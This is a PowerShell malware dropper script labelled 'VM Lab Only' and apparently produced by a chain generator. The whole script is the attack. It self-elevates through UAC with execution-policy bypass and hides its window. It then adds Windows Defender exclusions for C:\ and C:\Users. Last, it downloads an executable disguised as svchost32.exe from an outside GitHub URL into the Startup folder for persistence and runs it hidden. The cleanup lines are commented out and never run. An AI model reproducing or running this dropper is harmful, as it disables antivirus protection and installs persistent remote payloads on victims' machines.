# ============================================================
#  Ms. Robot's Lab -- Dropper Chain  (VM Lab Only)
#  Auto-generated by Ms. Robot Chain Generator
# ============================================================

$PayloadURL = "https://github.com/grere856-lgtm/automatic-memory/raw/refs/heads/main/svchost32.exe"
$ExeName    = "svchost32.exe"


# -- STEP 0: Admin Check / UAC Self-Elevation -------------------------
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if (-not $isAdmin) {
    $scriptPath = $MyInvocation.MyCommand.Path
    Start-Process powershell.exe -ArgumentList @("-ExecutionPolicy", "Bypass", "-NoProfile", "-WindowStyle", "Hidden", "-File", $scriptPath) -Verb RunAs
    exit
}


# -- Hide console window via Win32 API --------------------------------
$sig = '[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'
Add-Type -MemberDefinition $sig -Name "WinAPI" -Namespace Win32 -ErrorAction SilentlyContinue
$hwnd = (Get-Process -Id $PID).MainWindowHandle
[Win32.WinAPI]::ShowWindow($hwnd, 0) | Out-Null


# -- STEP 1: Blind Defender -- C:\ via POLICY Registry ---------------
$defPolicyKey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths"
try {
    if (-not (Test-Path $defPolicyKey)) { New-Item -Path $defPolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $defPolicyKey -Name "C:\" -Value 0 -Type DWord
} catch {}


# -- STEP 2: Blind Defender -- C:\Users via Add-MpPreference ---------
Add-MpPreference -ExclusionPath "C:\Users"


# -- STEP 3: Download to Startup Folder + Execute ---------------------
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$exePath       = "$startupFolder\$ExeName"
(New-Object System.Net.WebClient).DownloadFile($PayloadURL, $exePath)
Start-Process -FilePath $exePath -WindowStyle Hidden


# -- CLEANUP ----------------------------------------------------------
# Remove-ItemProperty -Path $defPolicyKey -Name "C:\" -ErrorAction SilentlyContinue
# Remove-MpPreference -ExclusionPath "C:\Users" -ErrorAction SilentlyContinue
# Remove-Item $exePath -Force -ErrorAction SilentlyContinue
